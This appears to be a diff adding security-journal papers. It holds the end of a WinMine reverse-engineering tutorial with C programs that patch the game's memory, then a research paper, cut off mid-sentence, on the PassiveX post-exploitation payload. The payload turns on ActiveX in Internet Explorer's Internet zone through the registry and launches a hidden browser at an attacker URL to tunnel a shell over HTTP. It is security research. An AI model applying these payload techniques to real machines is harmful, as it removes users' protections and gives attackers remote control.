*PPROCESSENTRY32; + +Most notably of which is szExeFile, which will allow the reader to locate +the WinMine process, and th32ProcessID, which provides the process ID to +attach to once the WinMine process is found. Once the WinMine process is +located, it can be attached to via the OpenProcess function, which has +the following prototype: + +HANDLE OpenProcess( + DWORD dwDesiredAccess, + BOOL bInheritHandle, + DWORD dwProcessId +); + +Once the WinMine process has been opened, the reader may read the current +playing grid from its virtual memory via the ReadProcessMemory function, +which has the following prototype: + +BOOL ReadProcessMemory( + HANDLE hProcess, + LPCVOID lpBaseAddress, + LPVOID lpBuffer, + SIZE_T nSize, + SIZE_T* lpNumberOfBytesRead +); + +After the grid is read into the buffer, the reader may loop through it +replacing all instances of 0x8f with either 0x8a to reveal bombs, or 0x0f to +remove them. This modified buffer can then be written back into the WinMine +process with the WriteProcessMemory function, which has the following +prototype: + +BOOL WriteProcessMemory( + HANDLE hProcess, + LPVOID lpBaseAddress, + LPCVOID lpBuffer, + SIZE_T nSize, + SIZE_T* lpNumberOfBytesWritten +); + +With this information, the reader has the tools necessary to develop an +application that to reach the ultimate goal of this paper, to reveal +and/or remove bombs from the WinMine playing grid. The source code +for a functioning demonstration of this can be found in the reference +section.[13] + + +8) Conclusion + +Throughout this document the reader has been exposed to portions of many +concepts required to successfully locate, comprehend, and manipulate the +WinMine playing grid. As such, many details surrounding these concepts +were neglected for the sake of brevity. In order to obtain a more holistic +view of the covered concepts, the reader is encouraged to read those items +articulated in the reference section and seek out additional works. + +References + + 1. Calling Conventions http://www.unixwiz.net/techtips/win32-callconv-asm.html + 2. Symbol Server http://www.microsoft.com/whdc/devtools/debugging/debugstart.mspx + 3. Symbols ms-help://MS.PSDK.1033/debug/base/symbolfiles.htm + 4. Platform SDK www.microsoft.com/msdownload/platformsdk/sdkupdate/ + 5. Endianness http://www.intel.com/design/intarch/papers/endian.pdf + 6. EFLAGS ftp://download.intel.com/design/Pentium4/manuals/25366514.pdf Appendix B + 7. Intel Command References http://www.intel.com/design/pentium4/manuals/indexnew.htm + 8. Debugger Quick Reference http://www.tonyschr.net/debugging.htm + 9. WinDBG Prompt Reference WinDBG Help, Search, Command Window Prompt + 10. Regular Expressions Reference WinDBG Help, Search, Regular Expression Syntax + 11. TEB http://msdn.microsoft.com/library/en-us/dllproc/base/teb.asp + 12. SetGrid.cpp + +/********************************************************************** + * SetGrid.cpp - trew@exploit.us + * + * This is supplemental code intended to accompany 'Introduction to + * Reverse Engineering Windows Applications' as part of the Uninformed + * Journal. This application sets the reader's playing grid in a + * deterministic manner so that demonstrations made within the paper + * correlate with what the reader encounters in his or her instance of + * WinMine. + * + *********************************************************************/ + +#include +#include +#include + +#pragma comment(lib, "advapi32.lib") + +#define GRID_ADDRESS 0x1005360 +#define GRID_SIZE 0x300 + +int main(int argc, char *argv[]) { + + HANDLE hProcessSnap = NULL; + HANDLE hWinMineProc = NULL; + + PROCESSENTRY32 peProcess = {0}; + + unsigned int procFound = 0; + unsigned long bytesWritten = 0; + + unsigned char grid[] = + + "\x10\x0f\x8f\x8f\x8f\x8f\x8f\x0f\x8f\x8f\x8f\x8f\x0f\x0f\x8f\x0f" + "\x0f\x8f\x8f\x8f\x8f\x8f\x8f\x0f\x0f\x0f\x8f\x0f\x0f\x8f\x8f\x10" + "\x10\x8f\x0f\x0f\x8f\x8f\x0f\x0f\x0f\x0f\x0f\x8f\x0f\x0f\x8f\x8f" + "\x0f\x8f\x0f\x0f\x0f\x8f\x8f\x8f\x0f\x0f\x8f\x8f\x8f\x8f\x8f\x10" + "\x10\x0f\x0f\x8f\x0f\x0f\x8f\x0f\x0f\x0f\x0f\x0f\x8f\x0f\x0f\x0f" + "\x8f\x0f\x0f\x0f\x8f\x8f\x0f\x0f\x8f\x0f\x8f\x0f\x8f\x8f\x0f\x10" + "\x10\x0f\x0f\x8f\x0f\x0f\x8f\x0f\x0f\x0f\x8f\x0f\x0f\x8f\x0f\x0f" + "\x8f\x0f\x0f\x8f\x0f\x0f\x0f\x8f\x0f\x0f\x0f\x8f\x0f\x0f\x0f\x10" + "\x10\x0f\x0f\x8f\x0f\x8f\x8f\x0f\x0f\x8f\x8f\x0f\x0f\x8f\x0f\x0f" + "\x0f\x0f\x0f\x0f\x8f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x8f\x0f\x0f\x10" + "\x10\x8f\x0f\x0f\x0f\x0f\x0f\x0f\x8f\x8f\x0f\x8f\x8f\x0f\x0f\x8f" + "\x0f\x8f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x8f\x8f\x0f\x10" + "\x10\x8f\x0f\x8f\x8f\x0f\x8f\x8f\x0f\x0f\x0f\x8f\x8f\x0f\x8f\x0f" + "\x0f\x0f\x0f\x8f\x0f\x8f\x0f\x8f\x0f\x0f\x8f\x8f\x0f\x8f\x0f\x10" + "\x10\x8f\x8f\x0f\x0f\x0f\x8f\x0f\x0f\x0f\x0f\x8f\x8f\x8f\x8f\x0f" + "\x0f\x0f\x0f\x0f\x0f\x8f\x8f\x8f\x0f\x0f\x0f\x0f\x8f\x8f\x8f\x10" + "\x10\x8f\x0f\x8f\x8f\x8f\x0f\x0f\x0f\x0f\x0f\x8f\x0f\x8f\x0f\x0f" + "\x8f\x8f\x0f\x0f\x0f\x8f\x0f\x8f\x0f\x8f\x0f\x0f\x0f\x0f\x0f\x10" + "\x10\x0f\x0f\x8f\x8f\x0f\x8f\x8f\x8f\x8f\x0f\x0f\x0f\x0f\x0f\x0f" + "\x0f\x0f\x0f\x0f\x0f\x8f\x0f\x8f\x8f\x8f\x8f\x8f\x8f\x8f\x8f\x10" + "\x10\x0f\x0f\x0f\x8f\x8f\x8f\x0f\x8f\x8f\x0f\x0f\x0f\x8f\x0f\x0f" + "\x0f\x8f\x0f\x8f\x0f\x0f\x0f\x8f\x8f\x0f\x0f\x0f\x0f\x8f\x8f\x10" + "\x10\x0f\x8f\x8f\x0f\x8f\x0f\x8f\x0f\x8f\x0f\x8f\x8f\x0f\x0f\x8f" + "\x0f\x0f\x0f\x0f\x0f\x0f\x8f\x8f\x0f\x0f\x8f\x0f\x8f\x0f\x0f\x10" + "\x10\x0f\x0f\x8f\x8f\x0f\x8f\x0f\x0f\x0f\x8f\x0f\x0f\x0f\x8f\x0f" + "\x8f\x0f\x8f\x8f\x8f\x0f\x0f\x8f\x0f\x8f\x0f\x8f\x8f\x8f\x8f\x10" + "\x10\x8f\x8f\x0f\x0f\x0f\x0f\x0f\x0f\x8f\x0f\x8f\x0f\x0f\x8f\x0f" + "\x0f\x0f\x8f\x8f\x8f\x8f\x8f\x0f\x0f\x8f\x8f\x0f\x0f\x8f\x8f\x10" + "\x10\x8f\x0f\x0f\x0f\x8f\x0f\x8f\x8f\x8f\x8f\x0f\x0f\x8f\x8f\x0f" + "\x0f\x8f\x0f\x0f\x8f\x8f\x8f\x8f\x0f\x8f\x0f\x8f\x0f\x8f\x8f\x10" + "\x10\x0f\x8f\x8f\x0f\x0f\x8f\x8f\x8f\x0f\x8f\x0f\x0f\x0f\x0f\x0f" + "\x0f\x8f\x8f\x8f\x0f\x0f\x8f\x0f\x8f\x8f\x8f\x0f\x8f\x8f\x0f\x10" + "\x10\x8f\x0f\x0f\x8f\x8f\x8f\x8f\x0f\x0f\x8f\x0f\x0f\x0f\x8f\x8f" + "\x8f\x8f\x0f\x0f\x0f\x0f\x0f\x8f\x0f\x8f\x8f\x0f\x0f\x8f\x0f\x10" + "\x10\x0f\x8f\x8f\x0f\x0f\x0f\x0f\x8f\x0f\x8f\x0f\x8f\x0f\x0f\x0f" + "\x0f\x0f\x0f\x8f\x0f\x0f\x0f\x8f\x0f\x0f\x0f\x8f\x0f\x8f\x0f\x10" + "\x10\x0f\x0f\x0f\x0f\x8f\x8f\x8f\x8f\x8f\x0f\x0f\x0f\x8f\x0f\x0f" + "\x8f\x8f\x8f\x0f\x0f\x8f\x8f\x8f\x0f\x0f\x8f\x0f\x0f\x8f\x0f\x10" + "\x10\x8f\x8f\x0f\x8f\x8f\x0f\x8f\x8f\x0f\x0f\x0f\x0f\x8f\x8f\x8f" + "\x8f\x0f\x8f\x0f\x0f\x0f\x8f\x0f\x8f\x8f\x8f\x0f\x8f\x0f\x0f\x10" + "\x10\x0f\x8f\x8f\x0f\x0f\x8f\x8f\x8f\x0f\x0f\x8f\x0f\x0f\x0f\x0f" + "\x0f\x0f\x8f\x8f\x0f\x8f\x0f\x0f\x0f\x0f\x0f\x0f\x8f\x0f\x8f\x10" + "\x10\x0f\x0f\x8f\x0f\x8f\x0f\x8f\x8f\x0f\x0f\x0f\x0f\x0f\x0f\x0f" + "\x0f\x8f\x0f\x0f\x0f\x0f\x0f\x0f\x8f\x0f\x0f\x0f\x0f\x0f\x8f\x10" + "\x10\x0f\x8f\x8f\x8f\x0f\x8f\x0f\x8f\x0f\x0f\x8f\x0f\x0f\x8f\x0f" + "\x0f\x8f\x8f\x0f\x0f\x0f\x0f\x8f\x0f\x8f\x8f\x0f\x0f\x0f\x8f\x10" + "\x10\x8f\x0f\x0f\x0f\x8f\x0f\x0f\x8f\x0f\x8f\x0f\x0f\x0f\x0f\x8f" + "\x0f\x8f\x0f\x0f\x0f\x8f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x8f\x8f\x10"; + + + //Get a list of running processes + hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + + if(hProcessSnap == INVALID_HANDLE_VALUE) { + printf("Unable to get process list (%d).\n", GetLastError()); + return 0; + } + + peProcess.dwSize = sizeof(PROCESSENTRY32); + + //Get first process in list + if(Process32First(hProcessSnap, &peProcess)) { + + do { + //Is it's winmine.exe? + if(!stricmp(peProcess.szExeFile, "winmine.exe")) { + + printf("Found WinMine Process ID (%d)\n", peProcess.th32ProcessID); + procFound = 1; + + //Get handle on winmine process + hWinMineProc = OpenProcess(PROCESS_ALL_ACCESS, + 1, + peProcess.th32ProcessID); + + //Make sure the handle is valid + + if(hWinMineProc == NULL) { + printf("Unable to open minesweep process (%d).\n", GetLastError()); + return 0; + } + + //Write grid + if(WriteProcessMemory(hWinMineProc, + (LPVOID)GRID_ADDRESS, + (LPCVOID)grid, + GRID_SIZE, + &bytesWritten) == 0) { + printf("Unable to write process memory (%d).\n", GetLastError()); + return 0; + } else { + printf("Grid Update Successful\n"); + } + + //Let go of minesweep + CloseHandle(hWinMineProc); + break; + } + + //Get next process + } while(Process32Next(hProcessSnap, &peProcess)); + } + + if(!procFound) + printf("WinMine Process Not Found\n"); + + return 0; +} + + 13. MineSweeper.cpp + +/********************************************************************** + * MineSweeper.cpp - trew@exploit.us + * + * This is supplemental code intended to accompany 'Introduction to + * Reverse Engineering Windows Applications' as part of the Uninformed + * Journal. This application reveals and/or removes mines from the + * WinMine grid. Note, this code only works on the version of WinMine + * shipped with WinXP, as the versions differ between releases of + * Windows. + * + *********************************************************************/ + +#include +#include +#include + +#pragma comment(lib, "advapi32.lib") + +#define BOMB_HIDDEN 0x8f +#define BOMB_REVEALED 0x8a +#define BLANK 0x0f +#define GRID_ADDRESS 0x1005360 +#define GRID_SIZE 0x300 + +int main(int argc, char *argv[]) { + + HANDLE hProcessSnap = NULL; + HANDLE hWinMineProc = NULL; + + PROCESSENTRY32 peProcess = {0}; + + unsigned char procFound = 0; + unsigned long bytesWritten = 0; + unsigned char *grid = 0; + unsigned char replacement = BOMB_REVEALED; + unsigned int x = 0; + + grid = (unsigned char *)malloc(GRID_SIZE); + + if(!grid) + return 0; + + if(argc > 1) { + if(stricmp(argv[1], "remove") == 0) { + replacement = BLANK; + } + } + + //Get a list of running processes + hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + + //Ensure the handle is valid + if(hProcessSnap == INVALID_HANDLE_VALUE) { + printf("Unable to get process list (%d).\n", GetLastError()); + return 0; + } + + peProcess.dwSize = sizeof(PROCESSENTRY32); + + //Get first process in list + if(Process32First(hProcessSnap, &peProcess)) { + + do { + //Is it's winmine.exe? + if(!stricmp(peProcess.szExeFile, "winmine.exe")) { + + printf("Found WinMine Process ID (%d)\n", peProcess.th32ProcessID); + procFound = 1; + + //Get handle on winmine process + hWinMineProc = OpenProcess(PROCESS_ALL_ACCESS, + 1, + peProcess.th32ProcessID); + + //Make sure the handle is valid + if(hWinMineProc == NULL) { + printf("Unable to open minesweep process (%d).\n", GetLastError()); + return 0; + } + + //Read Grid + if(ReadProcessMemory(hWinMineProc, + (LPVOID)GRID_ADDRESS, + (LPVOID)grid, GRID_SIZE, + &bytesWritten) == 0) { + printf("Unable to read process memory (%d).\n", GetLastError()); + return 0; + } else { + //Modify Grid + for(x=0;x<=GRID_SIZE;x++) { + if((*(grid + x) & 0xff) == BOMB_HIDDEN) { + *(grid + x) = replacement; + } + } + } + + //Write grid + if(WriteProcessMemory(hWinMineProc, + (LPVOID)GRID_ADDRESS, + (LPCVOID)grid, + GRID_SIZE, + &bytesWritten) == 0) { + printf("Unable to write process memory (%d).\n", GetLastError()); + return 0; + } else { + printf("Grid Update Successful\n"); + } + + //Let go of minesweep + CloseHandle(hWinMineProc); + break; + } + + //Get next process + } while(Process32Next(hProcessSnap, &peProcess)); + } + + if(!procFound) + printf("WinMine Process Not Found\n"); + + return 0; +} diff --git a/uninformed/1.2.txt b/uninformed/1.2.txt new file mode 100644 index 0000000..bf14b7f --- /dev/null +++ b/uninformed/1.2.txt @@ -0,0 +1,1219 @@ +Post-Exploitation on Windows using ActiveX Controls +skape +mmiller@hick.org +Last modified: 03/18/2005 + + +1) Foreword + +Abstract: When exploiting software vulnerabilities it is +sometimes impossible to build direct communication channels between +a target machine and an attacker's machine due to restrictive +outbound filters that may be in place on the target machine's +network. Bypassing these filters involves creating a +post-exploitation payload that is capable of masquerading as normal +user traffic from within the context of a trusted process. One +method of accomplishing this is to create a payload that enables +ActiveX controls by modifying Internet Explorer's zone restrictions. +With ActiveX controls enabled, the payload can then launch a hidden +instance of Internet Explorer that is pointed at a URL with an +embedded ActiveX control. The end result is the ability for an +attacker to run custom code in the form of a DLL on a target machine +by using a trusted process that uses one or more trusted +communication protocols, such as HTTP or DNS. + +Thanks: The author would like to thank H D Moore, spoonm, +vlad902, thief, warlord, optyx, johnycsh, trew, jhind, and all the +other people who continue to research new and interesting things for +their own satisfaction and enjoyment. The author would also like to +thank the Metasploit Framework mailing list for the discussion on +HTTP tunneling which served as the impetus for implementing and +integrating PassiveX. + +The source code to the ActiveX Injection Payload and ActiveX control +described in this document can be found as an update to the +Metasploit Framework version 2.3 which can be downloaded from +http://www.metasploit.com. PassiveX was tested with ZoneAlarm +version 5.5.062.011. + + +2) Introduction + +The emphasis in exploit development tends to lean more towards the +techniques used to successfully execute code on a target machine +rather than the code, or payload, that will actually be executed +once an exploit has taken advantage of a vulnerability. While such +an emphasis is an obvious and warranted pre-requisite, it is also +just as important to identify and refine the techniques that can be +used once it is possible to execute arbitrary code on a target +machine. In general, most published exploits include a finite set +of payloads that are themselves only capable of performing a small +set of actions, such as connecting back to the attacker and +providing them with a command interpreter or allowing the attacker +to connect to the target machine to gain access to a command +interpreter There are other classes of post-exploitation +payloads but these two are the most prominent. findsock +style payloads are excluded from this discussion due to the fact +that they are vulnerability dependent and as such not as universal +as the two commonly used payloads.. Payloads such as these are +indeed quite useful but are prone to failure under conditions that +cannot always be predicted by an attacker. + +For instance, an attacker could be exploiting a software +vulnerability in an HTTP server that only permits connections to +port 80. In this case, if an attacker were to use a payload that +binds to a port on the target machine, the attacker would soon find +that it would be impossible to connect to the bound port, regardless +of whether or not the exploit actually succeeded In some +cases it is possible to rebind to the port of the service being +exploited. This fact is outside of the scope of this document.. +The same case applies to payloads that establish a connection to the +attacker on an arbitrary port. If the service being attacked is on +a machine that has restrictive outbound filters or has a personal +firewall installed that restricts specific types of internet access +for certain applications, the attacker may find it impossible to use +either of the two common payloads. + +With that said, the majority of computers connected to the internet +do not have highly restrictive outbound filters. The reason this is +the case is because many home users simply plug their computer +directly into the internet via their cable modem, DSL router, or +phone line instead of a network firewall device. Furthermore, the +level of understanding required to competently manage outbound +filters is generally not something that is a strong desire or +possibility for the average computer user. For the sake of +discussion, however, these users will be disregarded due to the fact +that currently employed payloads are sufficient to establish a +communication channel between the attacker and a target machine. +Instead, the focus will be put upon those machines that make use of +outbound filters that are capable of preventing the two +aforementioned payloads from being used. + +There are three types of outbound filters that can be differentiated +by the OSI layer at which they filter and by the physical location +at which they reside. The first type of outbound filter is the +network-based filter which operates at the network and transport +layer by filtering connections based on information that is required +to communicate with a host, such as the destination IP address or +port of a packet. The second type of outbound filter is the +application-based filter which operates at the application layer by +filtering network traffic to certain destinations based on the +application that is performing the network action An +example of this comes in the form of ZoneAlarm's outbound filter +that prompts the user when an application attempts to make a +connection to determine whether or not the connection should be +allowed.. The third type of outbound filter operates transparently +at various layers of the OSI model as a type of protocol form +validation, such as a transparent HTTP proxy. These three filters +can be combined to create a robust and dynamic method of filtering +outbound connections that, while not perfect, does indeed lend +itself well to helping ensure the integrity of a network. + +The reason these three outbound filters are not perfect is because +of the fact that they still allow outbound communication. Though +this may seem like a paradox, it is actually a real problem. Take +for instance a scenario where a corporation's workstation is being +exploited through a client-side chat client vulnerability. In this +scenario, the corporation has configured their network firewalls to +allow communication to internet addresses on port 80 only. All +other outbound ports are filtered and cannot be communicated with. +Given these restrictions, an attacker might simply instruct his or +her payload to connect back to the attacker on port 80, thus +bypassing the other outbound restrictions altogether. While this +would indeed work, there are steps that the corporation could take +to help prevent this approach. For instance, if the same +corporation were to force all HTTP traffic through a transparent or +true HTTP proxy, the attacker would be unable to simply pipe a +command interpreter through a connection on port 80 since the data +would not be well-formed HTTP traffic. + +This is where things begin to get interesting and the inherent flaw +of generic outbound filters begins to come to light. Under the +aforementioned condition, a corporation has their network configured +to permit outbound communication on port 80 only and furthermore +requires all port 80 communication to pass through a transparent +HTTP proxy. As such, it is a requirement that all traffic passing +through port 80 to internet hosts be well-formed HTTP requests and +responses, else the transparent proxy will not permit it to pass. +The obvious thing for an attacker to do, then, is to tunnel or +encode their communication in valid HTTP requests and responses, +thus bypassing all of the restrictions that the corporation has put +in place. Hope is not yet lost for the corporation, however, for +they could deploy a personal firewall, such as ZoneAlarm, that is +capable of doing per-application outbound filters. This would allow +the corporation to make it so only a browser, such as Internet +Explorer or Mozilla, is capable of connecting to internet hosts on +port 80. All other applications, such as the chat client that is +being exploited in this scenario, would be unable to connect to +internet hosts on port 80 in the first place. + +It may seem like this would be enough to stop an attacker from being +able to build a communication channel between themselves and the +target machine, but the fact is that it is not, and thus the +inherent flaw in generic outbound filters is realized: If a +user is capable of communicating with hosts on the internet, so too +is an attacker capable of doing so from the user's computer. In +this case, an attacker could simply inject code into a trusted +browser process that then constructs an HTTP tunnel between the +target machine and the attacker, thus bypassing both the application +layer,network layer, and transparent outbound filters that the +corporation has put into place. + +The example of the HTTP tunnel is just one of many protocols that +can be used or abused to tunnel arbitrary data through restrictive +outbound filters. Other protocols that can, and have, been used in +the past for arbitrary data tunneling are DNS, POP3, and SMTP. These +protocols are also likely, though some of them less than others, to +be ones that a corporation or a user are likely to permit both at +the network layer and at the application layer. For the purpose of +this paper, only the implementation of the HTTP tunnel will be +discussed for it is the most likely of all others to be capable of +passing transparently through outbound filters The second +most likely, in the author's opinion, is DNS.. The following +chapters will discuss the implementation of a payload that is +capable of bypassing the scenario discussed in this introduction on +the Windows platform. From there, a number of potential uses, both +legitimate and otherwise, will be discussed to give a sense of +severity for the problem at hand. Finally, some suggestions will be +made on how payloads of this sort might be prevented from being +leveraged by an attacker in the future. + + +3) Implementation: PassiveX + +Implementing a payload that is capable of bypassing restrictive +outbound filters, such as those outlined in the introduction, +requires that the traffic produced by the payload be, for all +intents and purposes, indistinguishable from normal user traffic. +The protocol that should be used to encapsulate the attacker's +arbitrary data, such as the input and output from the command +interpreter, should also be one that is likely to be permitted by +the various types of outbound filters, whether they be network or +application based. One of the protocols capable of fulfilling both +of these requirements is HTTP. By making use of HTTP requests and +responses, it is possible for an attacker to create a bidirectional +tunnel between the target machine and the attacker's machine that +can be used to pass arbitrary data. + +The way in which the tunnel can be constructed using HTTP is to +create two logical channels, similar to that of a bidirectional +pipe. The first channel, Tx, would be used to transmit +data from the target machine to the attacker's machine by making use +of an HTTP POST request. The content of the POST +would be the data that should be handed to the attacker. The second +channel, Rx, would be used to transmit data from the +attacker's machine to the target machine. The problem is, however, +that the data cannot be directly transmitted from the attacker's +machine to the target machine while still staying within the +parameters of well-formed HTTP traffic It is possible to +make use of technology like chunked encoding, however, such +technology is seen as easier to flag and detect as malicious traffic +from the perspective of an outbound filter and cannot always be +relied upon to work when passing through HTTP proxies.. One way of +getting around this fact would be to use a polling model whereby the +target machine sends polling HTTP GET or POST +requests to the attacker's machine to see if there is any data +available that should be handed to the target machine's half of the +tunnel. Once there is data available it can be included in the +content of the HTTP response to the target machine's HTTP request. +This approach is one that is commonly used and employed as a +tunneling mechanism. + +The first step in the building of an HTTP tunnel between the target +machine and the attacker's machine is to implement the payload that +will be executed after a given exploit succeeds. There are a number +of ways in which such a payload could be written with the most +obvious being a payload that directly builds and maintains the +bidirectional HTTP tunnel between the attacker and the target +machine. While this approach may sound good in principal, it is not +entirely practical. The reason for this is that the payload must be +written in assembly or in a language that is capable of producing +position independent code. This fact alone would make the +implementation of a payload that accomplishes HTTP tunneling tedious +but is in itself not necessarily enough to make it impractical. What +does make it impractical, however, is the fact that implementing +such a payload in a portable and position independent fashion would +lead to a very large payload. The size of a payload tends to be +rather important as it directly determines whether or not it can be +employed under certain conditions, such as where a vulnerability +only has a limited amount of room in which to store the payload that +will be executed. In scenarios such as these it is preferable to +have a payload that is as small as possible and yet still capable of +performing the task at hand. + +Even if it were possible to implement a small payload that were +capable of managing the HTTP tunneling, it alone would not be enough +to satisfy the requirements for the payload described in the +introduction. The reason it is not enough is because such a payload +would not necessarily be capable of bypassing application-based +outbound filters due to the fact that the application being +exploited, such as a chat client, may not itself be directly capable +of communicating with hosts on the internet over port 80. Instead, +it becomes necessary to run the code that performs the actual HTTP +tunneling in the context of a process that is most likely trusted by +the target machine, such as Internet Explorer. With this in mind it +seems clear that a technique other than implementing the entire HTTP +tunneling code in position independent assembly is necessary, both +from a practical and functional standpoint. + +An alternate technique that can be used is to implement a payload +that is itself not directly responsible for managing or initializing +the HTTP tunnel, but rather facilitates the execution of the code +that will be responsible for doing so. It's important to note, +however, that such a payload must do so in a fashion that does not +require network access due to the fact that ignoring such a +requirement would defeat the entire purpose of the HTTP tunneling +payload that it would be trying to load. With this in mind, it +becomes necessary to look towards other approaches that are capable +of facilitating the execution of code that will build an HTTP tunnel +between the target machine and the attacker's machine and, +furthermore, will do so using a medium that is compatible with the +various types of outbound filters. + +As luck would have it, a solution to this problem can be found in +Internet Explorer's ability to download and execute plugins. These +plugins, which are more commonly known as ActiveX controls, are a +means by which programmers can extend or enhance features in +Internet Explorer in a generic fashion Which, as fate would +have it, just so happens to align well with this paper's intention +of creating an HTTP tunnel in the context of a trusted process.. +Though ActiveX controls do have merit, many computer users tend to +be familiar with them not for the benefits they bring, but rather +for the spyware and other malicious content that they seem to +provide or be associated with. Due to this fact, it has become +common practice for computer's to be configured with ActiveX support +either completely disabled or conditionally permitted based on +Internet Explorer's built-in zone restrictions. + +Zone restrictions are a way in which Internet Explorer allows a user +to control the level of trust that is given to various sites. For +instance, sites in the Trusted Sites zone are considered to +have the highest level of trust and are thus capable of executing +ActiveX controls and other privileged content without necessarily +requiring input from the user. On the other hand, the +Internet zone represents the set of sites that exist on the +internet and are not expressly trusted by the user. The +Internet zone typically defaults to prohibiting the +downloading and execution of unsigned ActiveX controls. If an +ActiveX control is signed, the user will be prompted to determine +whether or not they wish to allow the signer of the ActiveX control +to execute code on the user's machine. + +With this knowledge of Internet Explorer's zone restrictions and its +built-in ability to download and execute ActiveX controls, it is +possible to construct a payload that can facilitate the establishing +of an HTTP tunnel between the target machine and the attacker, +regardless of whether or not outbound filters exist. One way that +this can be accomplished is by implementing a payload that first +modifies the zone restrictions for the Internet zone to +allow the downloading and execution of all ActiveX controls, thus +allowing it to work in environments that have explicitly disabled +ActiveX controls. The payload can then execute a hidden instance of +Internet Explorer and direct it at a URL on the internet that is +controlled by the attacker. The content of the target URL, in this +scenario, would contain an embedded ActiveX control that Internet +Explorer would download and run without question. As such, the code +that would be responsible for building the HTTP tunnel could be +implemented in the context of the ActiveX control that is +downloaded, thus allowing the attacker to write the tunneling code +in his or her language of choice due to the fact that ActiveX +controls are language independent, so long as they conform to the +necessary COM interfaces. + +Before describing the implementation of the payload and the +respective ActiveX control, it is first important to understand some +of the negative aspects of using such an approach. One of the most +obvious cons is that such a payload is capable of, in the worst case +scenario, leaving a user's computer completely open to future +infection by way of untrusted ActiveX controls if the zone +restrictions on the Internet zone are not restored. This +can be solved by making the payload itself more robust in the way it +handles the restoration of the zone restrictions, but it comes at +the cost of size which isn't always something that can be conceded. +Another negative aspect of this approach is that it will not +function when used against a user that does not have administrative +privileges on the target machine. The reason for this is that +Internet Explorer is hard-coded to prevent the downloading and +execution of ActiveX controls that are not already registered and +installed on the target machine. Under scenarios where it is known +that a limited user account is being exploited, it may be possible +to modify the payload to inject a secondary payload into the context +of an Internet Explorer process that then downloads and registers +the control manually The control would have to be able to +be registered under the user-specific classes key instead of the +global classes key in order to avoid permission problems.. +Regardless of the payloads deficiencies, it should nonetheless be +consider a viable approach to the problem at hand. + +The payload itself has two distinct stages. The first stage is the +payload that the exploit will send across that will be responsible +for making modifications Internet Explorer's zone restrictions and +executing a hidden Internet Explorer to a URL that is controlled by +the attacker. The second stage starts once the ActiveX control that +was embedded in the attacker controlled URL is loaded into the +hidden Internet Explorer. Once loaded, the ActiveX control can +simply build an HTTP tunnel between the two machines due to the fact +that it's running in the context of a process that should be +trusted. This document's implementation of the payload will +henceforth be referred to as PassiveX Though PassiveX has +been used for other projects, it seemed only fitting to use for this +one as well.. + + +3.1) The ActiveX Injection Payload + +This section will describe the implementation of the payload that an +exploit will send across as the arbitrary code that is to be +executed once the exploit succeeds. This code will be executed in +the context of the exploited process and is what will be used to +facilitate the loading of an ActiveX control inside of an instance +of Internet Explorer. There are, as with all things, a number of +ways to implement this payload. The following steps describe the +actions that such a payload would need to perform in order to +accomplish this task. + + +1. Find KERNEL32.DLL and resolve symbols + +The first step, as is true with most Windows payloads, is to locate +the base address of KERNEL32.DLL. Determining the base +address of KERNEL32.DLL is necessary in order to load other +modules, such as ADVAPI32.DLL. The way that this is +accomplished is to resolve the address of +kernel32!LoadLibraryA. The technique used to locate the +base of KERNEL32.DLL can be any one of the typically +employed approaches, such as PEB or TOPSTACK. For +this payload, it is also necessary to resolve the address of +kernel32!CreateProcessA so that the hidden Internet +Explorer can be executed. + + +2. Load ADVAPI32.DLL and resolve symbols + +Once kernel32!LoadLibraryA has been resolved, the next step +is to load ADVAPI32.DLL since it may or may not already be +loaded. ADVAPI32.DLL provides the standard interface to +the registry that most applications, and the payload itself, need to +make use of. There are two specific functions that are needed for +the payload: advapi32!RegCreateKeyA and +advapi32!RegSetValueExA. + + +3. Open the Internet zone's registry key + +After resolving all of the necessary symbols, the next step is to +open the Internet zone's registry key for writing so that +the individual settings for ActiveX controls can be set to the +enabled status. This is accomplished by calling +advapi32!RegCreateKeyA in the following fashion: + +HKEY Key; + +RegCreateKeyA( + HKEY_CURRENT_USER, + "Software\Microsoft\Windows\CurrentVersion" + "\Internet Settings\Zones\3", + &Key); + +While testing this portion of the payload it was noted that Windows +2000 with Internet Explorer 5.0 does not have the necessary registry +keys created under the HKEY_USERS\.DEFAULT registry key. Even +if the necessary keys are created, the first time Internet Explorer +is executed from within the system service leads to the internet +connection wizard being displayed. This basically makes it such +that the payload is only capable of working on machines that have +Internet Explorer 6.0 installed (such as Windows XP and 2003 +Server). + +4. Modify IE's Internet zone restrictions + +Once the key has been successfully opened the zone restrictions for +prohibiting ActiveX controls from being used can be changed. There +are four settings that need to be toggled to ensure that ActiveX +controls will be usable: + +Setting Value Name | Description +-------------------------------- +1001 | Download signed ActiveX controls +1004 | Download unsigned ActiveX controls +1200 | Run ActiveX controls and plugins +1201 | Initialize and script ActiveX controls not marked as safe + +In order to make it so ActiveX controls can be used, each of the +above described settings must be changed to Enabled. This +is done by setting each of the values to 0 by calling +advapi32!RegSetValueExA on the opened key for each of the +individual registry values. After these values are set to enabled, +Internet Explorer will, by default, download and execute ActiveX +controls regardless of whether or not they are signed without user +interaction. The actual process of setting of a value is +demonstrated below: + +DWORD Enabled = 0; + +RegSetValueEx( + Key, + "1001", + 0, + REG_DWORD, + (LPBYTE)&Enabled, + sizeof(Enabled)); + +5. Determine the path to Internet Explorer + +With the zone restrictions modified, the next step is to determine +the full path to IEXPLORE.EXE. The reason this is +necessary is because IEXPLORE.EXE is not in the path by +default and thus cannot be executed by name. While +shell32!ShellExecuteA may appear like an option, it is in +fact not considering the fact that the target machine may have +Mozilla registered as the default web-browser. It should also not +be assumed that Internet Explorer will reside on a static drive, +such as the C: drive. Even though it may be common, there +are sure to be cases where it will not be true. + +One way of working around this issue is to use a very small portion +of code that determines the absolute path to internet explorer in +only two assembly instructions. The code itself makes an assumption +that Internet Explorer's installation will be on the same drive as +the Windows system directory and that it will also be installed +under its standard install directory. Barring this, however, the two +instructions should result in a portable implementation between +various versions of Windows NT+: + +url: + db "C:\progra~1\intern~1\iexplore -new http://site", 0x0 + +... + + fixup_ie_path: + mov cl, byte [0x7ffe0030] + mov byte [esi], cl + +In the above code snippet, esi points to url. The +static address being referenced is actually a portion of +SharedUserData that just so happens to point to the unicode +path of the system directory on the machine. By making the +assumption that the drive letter that the system directory is found +on will be the same as the one that Internet Explorer is found on, +it is possible to copy the first byte from the 